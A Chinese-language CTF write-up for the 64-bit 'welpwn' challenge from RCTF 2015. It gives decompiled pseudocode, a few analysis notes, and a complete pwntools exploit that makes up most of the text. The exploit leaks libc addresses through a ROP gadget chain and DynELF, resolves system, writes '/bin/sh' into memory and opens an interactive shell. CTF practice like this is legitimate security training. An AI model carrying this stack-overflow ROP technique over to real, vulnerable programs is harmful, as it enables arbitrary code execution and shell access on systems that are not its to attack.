五_3.泄露libc_CTF_2015-welpwn_64

伪源码

{
  char buf; // [sp+0h] [bp-400h]@1

  alarm(0xAu);
  write(1, "Welcome to RCTF\n", 0x10uLL);
  fflush(_bss_start);
  read(0, &buf, 0x400uLL);
  echo(&buf, &buf);
  return 0;
}

学过DynELF就再不怕，出题人你什么都不给了!

仔细分析

1.64位的传参不能直接放
2.gadget片段的选取，应该怎么选择
3.IDA好像没看出来，哪里存在溢出（自己没有进入echo查看）
4.echo：http://www.zsythink.net/archives/96/

EXP(后期补写脚本历程)

#!/usr/bin/python
#coding:utf-8
from  pwn import*

p = process('./welpwn')
elf = ELF("welpwn")

write_got_addr = elf.got['write']
write_addr = elf.plt['write']
read_addr = elf.plt['read']
read_got_addr = elf.got['read']
start_addr = 0x400630
pop_gadget1 = 0x40089a
mov_gadget2 = 0x400880
pop4_addr = 0x40089c
where_bin_sh_addr = 0x6010d0
pop1_addr = 0x4008a3

def leak(addr):
    p.recv(timeout = 0.1)
    payload = 'A'*24
    payload += p64(pop4_addr)  
    payload += p64(pop_gadget1)
    payload += p64(0) #rbx
    payload += p64(1) #rbp
    payload += p64(write_got_addr)
    payload += p64(8)
    payload += p64(addr)
    payload += p64(1)
    payload += p64(mov_gadget2)
    payload += "A"*56   #?
    payload += p64(start_addr)
    payload = payload.ljust(1024,"B")
    p.send(payload)   #!!!

    content = p.recv(4)
    p.recv(timeout = 0.1)
    print ("%#x -> %s"%(addr,(content or '').encode('hex')))
    return content
#gdb.attach(p)
d = DynELF(leak, elf = elf)
system_addr = d.lookup("system","libc")
log.info("system_addr = %#x",system_addr)


payload = "A"*24
payload += p64(pop4_addr)
payload += p64(pop_gadget1)
payload += p64(0)
payload += p64(1)
payload += p64(read_got_addr)
payload += p64(8)
payload += p64(where_bin_sh_addr)
payload += p64(0)
payload += p64(mov_gadget2)
payload += "A"*56

payload += p64(pop1_addr)
payload += p64(where_bin_sh_addr)
payload += p64(system_addr)
payload  = payload.ljust(1024,"b")
p.sendline(payload)
p.send("/bin/sh\x00")
p.interactive()